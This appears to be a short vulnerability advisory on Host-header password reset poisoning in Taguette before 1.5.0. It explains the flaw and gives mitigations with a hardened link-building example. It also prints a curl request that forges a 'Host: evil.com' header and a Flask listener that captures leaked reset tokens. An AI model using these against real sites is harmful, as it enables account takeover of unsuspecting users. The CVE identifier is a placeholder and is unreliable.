Taguette, Password Reset Poisoning, CVE-2025-XXXX (High)

How the mentioned CVE works:

The vulnerability in Taguette is a password reset poisoning attack. The application generates password reset links by insecurely constructing a URL using the externally-provided `Host` header. An attacker can request a password reset for a victim’s account while supplying a malicious `Host` header pointing to a server they control. The application then uses this attacker-controlled hostname to build the reset link sent to the victim via email. If the victim clicks this link in the email, their browser is directed to the attacker’s server. During this interaction, the victim’s valid password reset token is exposed to the attacker in the HTTP referrer header or within the URL itself. The attacker can then use this intercepted token to reset the victim’s password and gain unauthorized access to their account.

DailyCVE Form:

Platform: Taguette
Version: <1.5.0
Vulnerability: Host Header Poisoning
Severity: High

date: 2024-10-20

Prediction: Patch available.

What Undercode Say:

```bash
curl -X POST http://<taguette-host>/reset -H "Host: evil.com" -d "[email protected]"
```

```python
from flask import Flask, request

app = Flask(__name__)

# Listener that receives the poisoned link and logs the token from its path
@app.route('/reset/<token>')
def log_token(token):
    print(f"Token captured: {token}")
    return "404"

app.run(host='0.0.0.0', port=80)
```

How Exploit:

1. Attacker poisons reset link.

2. Victim clicks emailed link.

3. Token leaks to attacker.

4. Attacker hijacks account.

Protection from this CVE:

Upgrade to v1.5.0.

Avoid using the `Host` header when building password reset links.

Build URLs server-side from configuration rather than from request data.
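
The two link-building patterns side by side, with a Host allowlist check as defence in depth. This is an added example, not Taguette's code or its patch: `BASE_URL`, `ALLOWED_HOSTS`, the function names and the example.org hostname are assumptions, and the `/reset/<token>` path is taken from the snippet above.

```python
from urllib.parse import quote, urlsplit

# Assumed deployment settings (hypothetical names): the app's one public origin.
BASE_URL = "https://taguette.example.org"
ALLOWED_HOSTS = {"taguette.example.org"}


def reset_link_from_host(host_header: str, token: str) -> str:
    """Poisonable pattern: the link origin is copied from the request."""
    return f"https://{host_header}/reset/{quote(token, safe='')}"


def reset_link_from_config(token: str, base_url: str = BASE_URL) -> str:
    """Hardened pattern: the link origin comes only from configuration."""
    parts = urlsplit(base_url)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        raise ValueError("BASE_URL must be an absolute http(s) URL")
    return f"{parts.scheme}://{parts.netloc}/reset/{quote(token, safe='')}"


def host_allowed(host_header: str, allowed=ALLOWED_HOSTS) -> bool:
    """Defence in depth: refuse requests whose Host is not one of ours."""
    host = host_header.strip().lower()
    # Accept only "name" or "name:port"; anything else (userinfo, IPv6
    # literals, junk after the port) fails the checks below.
    name, _, port = host.partition(":")
    if port and not port.isdigit():
        return False
    return name.rstrip(".") in allowed


if __name__ == "__main__":
    token = "constructed-sample-token"  # constructed value, not a real token
    for host in ("taguette.example.org", "evil.com"):
        print(f"Host: {host!r} allowed={host_allowed(host)}")
        print("  from Host header:", reset_link_from_host(host, token))
        print("  from config:     ", reset_link_from_config(token))
```

With the configured origin, the emailed link is identical whatever `Host` value the reset request carried, so a poisoned request no longer changes where the victim is sent.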

Impact:

Account takeover.

Unauthorized data access.

Sources:

Reported By: github.com